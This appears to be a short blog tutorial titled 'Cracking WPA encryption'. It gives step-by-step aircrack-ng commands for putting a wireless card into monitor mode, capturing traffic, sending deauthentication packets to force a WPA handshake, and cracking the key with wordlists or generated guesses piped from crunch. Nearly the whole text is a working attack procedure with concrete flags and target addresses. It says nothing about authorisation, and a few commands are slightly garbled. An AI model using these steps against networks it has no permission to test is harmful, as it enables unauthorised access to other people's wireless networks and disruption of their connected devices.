Cracking WPA encryption

install aircrack-ng using synaptic manager on Ubuntu (or apt-get)….or use mac ports…

open terminal…run
NOTE : airmon-ng will not work for MAC

note-down your Wlan number you might need it later

airmon-ng start wlan0 11

wlan0 is the name of the Interface and 11 is the channel
verify if the monitor is started by running


you can check details using


using the following to start a aerodump to capture all wireless packets…

airodump-ng -c 11 -w psk ath0

UPDATE: on a mac you can use airport utility to create a dump/ sniff packets

you need to enable airport comand line utility. on the mac you can use airport -s to scan for all networks in range, and run
airport sniff "channel #"
to sniff all packets on the channel and log it, the .cap file can be found in /tmp folder

get the BSSID and STATION id from the aerodump and use it with aireplay-ng to send out a disconnect packet. This will force wifi devices to send out a 4way WPA authentication, that you can capture.

                          BSSID              STATION I
Daireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

once you feel you have captured enough packets(10-15k) u can use aircrack to crack the key…

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

you can use this  simple C code to create word combination and pipe the STDOUT to aircrack:

permuate -d -m 8 | aircrack-ng psk*.cap -w –

of you can use and do this
crunch 9 9 abcdefg |aircrack-ng psk*.cap -w -


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s